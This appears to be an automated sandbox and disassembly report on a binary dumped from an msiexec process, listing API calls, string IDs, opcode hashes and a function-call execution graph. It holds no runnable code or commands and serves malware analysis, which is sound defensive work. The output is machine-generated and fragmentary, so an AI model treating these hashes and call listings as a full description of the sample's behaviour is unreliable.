                                                                                                                                                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                      • String ID: %%-%d.%ds
                                                                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                                                                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                                                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                      • String ID: F^@
                                                                                                                                                      • API String ID: 568519121-3652327722
                                                                                                                                                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                      • String ID: WinPos
                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                      APIs
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                      • String ID: r!A
                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                      • API String ID: 2773794195-880857682
                                                                                                                                                      • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                      • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                      • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                      • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                      APIs
                                                                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                      • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                      • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                      APIs
                                                                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                      • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                      • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                      APIs
                                                                                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                      APIs
                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                      • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                      • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                      APIs
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                      • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                      • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1961120804-0
                                                                                                                                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:2.1%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                      Total number of Nodes:761
                                                                                                                                                      Total number of Limit Nodes:20
                                                                                                                                                      execution_graph 33690 40fc40 70 API calls 33865 403640 21 API calls 33691 427fa4 42 API calls 33866 412e43 _endthreadex 33867 425115 76 API calls __fprintf_l 33868 43fe40 133 API calls 33694 425115 83 API calls __fprintf_l 33695 401445 memcpy memcpy DialogBoxParamA 33696 440c40 34 API calls 32911 444c4a 32930 444e38 32911->32930 32913 444c56 GetModuleHandleA 32914 444c68 __set_app_type __p__fmode __p__commode 32913->32914 32916 444cfa 32914->32916 32917 444d02 __setusermatherr 32916->32917 32918 444d0e 32916->32918 32917->32918 32931 444e22 _controlfp 32918->32931 32920 444d13 _initterm __getmainargs _initterm 32921 444d6a GetStartupInfoA 32920->32921 32923 444d9e GetModuleHandleA 32921->32923 32932 40cf44 32923->32932 32927 444dcf _cexit 32929 444e04 32927->32929 32928 444dc8 exit 32928->32927 32930->32913 32931->32920 32983 404a99 LoadLibraryA 32932->32983 32934 40cf60 32935 40cf64 32934->32935 32991 410d0e 32934->32991 32935->32927 32935->32928 32937 40cf6f 32995 40ccd7 ??2@YAPAXI 32937->32995 32939 40cf9b 33009 407cbc 32939->33009 32944 40cfc4 33028 409825 memset 32944->33028 32945 40cfd8 33033 4096f4 memset 32945->33033 32950 407e30 _strcmpi 32952 40cfee 32950->32952 32951 40d181 ??3@YAXPAX 32953 40d1b3 32951->32953 32954 40d19f DeleteObject 32951->32954 32955 40cff2 RegDeleteKeyA 32952->32955 32956 40d007 EnumResourceTypesA 32952->32956 33057 407948 free free 32953->33057 32954->32953 32955->32951 32959 40d047 32956->32959 32960 40d02f MessageBoxA 32956->32960 32958 40d1c4 33058 4080d4 free 32958->33058 32962 40d0a0 CoInitialize 32959->32962 33038 40ce70 32959->33038 32960->32951 33055 40cc26 strncat memset RegisterClassA CreateWindowExA 32962->33055 32963 40d1cd 33059 407948 free free 32963->33059 32968 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33056 40c256 PostMessageA 32968->33056 32969 40d061 ??3@YAXPAX 32969->32953 32973 40d084 DeleteObject 32969->32973 32970 40d09e 32970->32962 32973->32953 32975 40d0f9 GetMessageA 32976 40d17b CoUninitialize 32975->32976 32977 40d10d 32975->32977 32976->32951 32978 40d113 TranslateAccelerator 32977->32978 32980 40d145 IsDialogMessage 32977->32980 32981 40d139 IsDialogMessage 32977->32981 32978->32977 32979 40d16d GetMessageA 32978->32979 32979->32976 32979->32978 32980->32979 32982 40d157 TranslateMessage DispatchMessageA 32980->32982 32981->32979 32981->32980 32982->32979 32984 404ac4 GetProcAddress 32983->32984 32985 404aec 32983->32985 32986 404ad4 32984->32986 32987 404add FreeLibrary 32984->32987 32989 404b13 32985->32989 32990 404afc MessageBoxA 32985->32990 32986->32987 32987->32985 32988 404ae8 32987->32988 32988->32985 32989->32934 32990->32934 32992 410d17 LoadLibraryA 32991->32992 32993 410d3c 32991->32993 32992->32993 32994 410d2b GetProcAddress 32992->32994 32993->32937 32994->32993 32996 40cd08 ??2@YAPAXI 32995->32996 32998 40cd26 32996->32998 32999 40cd2d 32996->32999 33067 404025 6 API calls 32998->33067 33001 40cd66 32999->33001 33002 40cd59 DeleteObject 32999->33002 33060 407088 33001->33060 33002->33001 33004 40cd6b 33063 4019b5 33004->33063 33007 4019b5 strncat 33008 40cdbf _mbscpy 33007->33008 33008->32939 33069 407948 free free 33009->33069 33013 407a1f malloc memcpy free free 33015 407cf7 33013->33015 33014 407ddc 33023 407e04 33014->33023 33075 407a1f 33014->33075 33015->33013 33015->33014 33017 407d83 33015->33017 33018 407d7a free 33015->33018 33015->33023 33073 40796e 7 API calls 33015->33073 33017->33015 33074 406f30 malloc memcpy free 33017->33074 33018->33015 33070 407a55 33023->33070 33024 407e30 33025 407e57 33024->33025 33026 407e38 33024->33026 33025->32944 33025->32945 33026->33025 33027 407e41 _strcmpi 33026->33027 33027->33025 33027->33026 33083 4097ff 33028->33083 33030 409854 33088 409731 33030->33088 33034 4097ff 3 API calls 33033->33034 33035 409723 33034->33035 33108 40966c 33035->33108 33122 4023b2 33038->33122 33044 40ced3 33206 40cdda 7 API calls 33044->33206 33045 40cece 33048 40cf3f 33045->33048 33159 40c3d0 memset GetModuleFileNameA strrchr 33045->33159 33048->32969 33048->32970 33051 40ceed 33185 40affa 33051->33185 33055->32968 33056->32975 33057->32958 33058->32963 33059->32935 33068 406fc7 memset _mbscpy 33060->33068 33062 40709f CreateFontIndirectA 33062->33004 33064 4019e1 33063->33064 33065 4019c2 strncat 33064->33065 33066 4019e5 memset LoadIconA 33064->33066 33065->33064 33066->33007 33067->32999 33068->33062 33069->33015 33071 407a65 33070->33071 33072 407a5b free 33070->33072 33071->33024 33072->33071 33073->33015 33074->33017 33076 407a38 33075->33076 33077 407a2d free 33075->33077 33082 406f30 malloc memcpy free 33076->33082 33078 407a44 33077->33078 33081 40796e 7 API calls 33078->33081 33080 407a43 33080->33078 33081->33023 33082->33080 33099 406f96 GetModuleFileNameA 33083->33099 33085 409805 strrchr 33086 409814 33085->33086 33087 409817 _mbscat 33085->33087 33086->33087 33087->33030 33100 44b090 33088->33100 33093 40930c 3 API calls 33094 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33093->33094 33095 4097c5 LoadStringA 33094->33095 33098 4097db 33095->33098 33097 4097f3 33097->32951 33098->33095 33098->33097 33107 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33098->33107 33099->33085 33101 40973e _mbscpy _mbscpy 33100->33101 33102 40930c 33101->33102 33103 44b090 33102->33103 33104 409319 memset GetPrivateProfileStringA 33103->33104 33105 409364 WritePrivateProfileStringA 33104->33105 33106 409374 33104->33106 33105->33106 33106->33093 33107->33098 33118 406f81 GetFileAttributesA 33108->33118 33110 409675 33111 4096ee 33110->33111 33112 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33110->33112 33111->32950 33119 409278 GetPrivateProfileStringA 33112->33119 33114 4096c9 33120 409278 GetPrivateProfileStringA 33114->33120 33116 4096da 33121 409278 GetPrivateProfileStringA 33116->33121 33118->33110 33119->33114 33120->33116 33121->33111 33208 409c1c 33122->33208 33125 401e69 memset 33247 410dbb 33125->33247 33128 401ec2 33271 4070e3 strlen _mbscat _mbscpy _mbscat 33128->33271 33129 401ed4 33260 406f81 GetFileAttributesA 33129->33260 33132 401ee6 strlen strlen 33134 401f15 33132->33134 33135 401f28 33132->33135 33272 4070e3 strlen _mbscat _mbscpy _mbscat 33134->33272 33261 406f81 GetFileAttributesA 33135->33261 33138 401f35 33262 401c31 33138->33262 33141 401f75 33143 402165 33141->33143 33144 401f9c memset 33141->33144 33142 401c31 5 API calls 33142->33141 33145 402195 ExpandEnvironmentStringsA 33143->33145 33146 4021a8 _strcmpi 33143->33146 33273 410b62 RegEnumKeyExA 33144->33273 33279 406f81 GetFileAttributesA 33145->33279 33146->33044 33146->33045 33149 401fc9 33149->33143 33150 401fd9 atoi 33149->33150 33154 406f81 GetFileAttributesA 33149->33154 33155 402076 memset memset strlen strlen 33149->33155 33156 4070e3 strlen _mbscat _mbscpy _mbscat 33149->33156 33157 4020dd strlen strlen 33149->33157 33158 402167 _mbscpy 33149->33158 33278 410b62 RegEnumKeyExA 33149->33278 33150->33149 33151 401fef memset memset sprintf 33150->33151 33274 410b1e 33151->33274 33154->33149 33155->33149 33156->33149 33157->33149 33158->33143 33160 40c422 33159->33160 